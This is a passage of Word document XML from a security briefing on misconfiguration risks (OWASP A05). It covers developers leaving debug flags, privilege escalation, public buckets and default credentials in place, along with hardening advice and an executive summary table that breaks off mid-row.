              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>location jump) is detected.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1F32D365" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>2. Developer Education: The Number One Misconception</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE479DE"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 xml:space="preserve">The most pervasive and dangerous bad habit among development teams is the </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>"I'll Fix It In Prod"</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> mentality, specifically regarding environment flags and testing utilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072431FD"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The Misconception: "It’s only a local/staging config; it won’t make it to production."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129E5F99" w14:textId="14DE75A5" w:rsidR="00D66BA1" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">During rapid feature development, engineers frequently change configuration parameters to bypass friction. They will set </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>DEBUG = True</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> , toggle </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>allow_privilege_escalation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>: true</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> inside a local Kubernetes manifest, open a cloud storage bucket to </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>public-read</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> to test file ingestion scripts, or leave standard </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>admin/admin</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> credentials active on an integration branch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3553ED38" w14:textId="63CEA399" w:rsidR="00B35A1F" w:rsidRPr="0083079C" w:rsidRDefault="00B35A1F" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09671341" wp14:editId="525A62F4">
            <wp:extent cx="5942857" cy="3238095"/>
            <wp:effectExtent l="0" t="0" r="127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2857" cy="3238095"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C63C42"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Why It Backfires</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30029B5A"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Modern continuous deployment (CD) workflows move too fast for manual audits. When pressure mounts to ship a hotfix, temporary testing parameters inside property files or deployment manifests are routinely committed to Git. If the infrastructure relies on manual review rather than automated pipeline gates, those testing overrides flow directly down the pipeline, overriding production security settings and silently exposing the enterprise to attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0E8A55"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The Solution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BDDD964"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 xml:space="preserve">Shift the developer mindset from </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>remediation</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>immutability</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> . Engineers must be educated to treat configuration exactly like compiled application logic: </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>local environments must mimic production hardening configurations by default.</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> If a feature requires debugging or elevated privileges to be analyzed during development, those exceptions must be handled dynamically through temporary local environmental profile overlays rather than hardcoded alterations to baseline source files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E98435"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The Summary (Executive Brief)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2181A58B"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Here is the completed executive summary block for your manager, styled as a highly professional, scannable briefing component.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B8997F"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Threat Profile Summary</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="PlainTable1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1760"/>
        <w:gridCol w:w="7051"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D66BA1" w:rsidRPr="0083079C" w14:paraId="09E51878" w14:textId="77777777" w:rsidTr="00B064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E54201" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1721E1EE" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Executive Assessment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D66BA1" w:rsidRPr="0083079C" w14:paraId="0BABEB9A" w14:textId="77777777" w:rsidTr="00B064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E85F21" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Vulnerability</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="51963CEB" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>OWASP A05:2025 – Security Misconfiguration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D66BA1" w:rsidRPr="0083079C" w14:paraId="2A18E496" w14:textId="77777777" w:rsidTr="00B0643B">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5D7A1975" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Risk Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="302F8548" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>High to Critical</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Emphasis"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>(Variable depending on the specific asset</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Emphasis"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>misconfigured)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D66BA1" w:rsidRPr="0083079C" w14:paraId="37F5A02D" w14:textId="77777777" w:rsidTr="00B064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0628A2" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Primary Root</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Cause</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F519609" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Complex application stacks and cloud infrastructures are deployed</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>with insecure default settings, verbose error capabilities, or lack</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>automated verification against configuration drift.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D66BA1" w:rsidRPr="0083079C" w14:paraId="410CC352" w14:textId="77777777" w:rsidTr="00B0643B">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="650EAE12" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Quick Detection</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F38CC91" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Run automated Infrastructure as Code (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>IaC</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>) linter checks pre-</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>deployment, paired with external DAST fuzzing to actively force</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>system errors and identify unhardened endpoints.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D66BA1" w:rsidRPr="0083079C" w14:paraId="4A7F44DB" w14:textId="77777777" w:rsidTr="00B064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AE0951" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Ultimate</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Prevention</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2CA82AD0" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Enforce fully automated, repeatable hardening baselines built via</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>Infrastructure as Code (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>IaC</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>) templates, completely eliminating manual</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>infrastructure provisioning.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D66BA1" w:rsidRPr="0083079C" w14:paraId="783471B7" w14:textId="77777777" w:rsidTr="00B0643B">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0F81507D" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Key Business</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
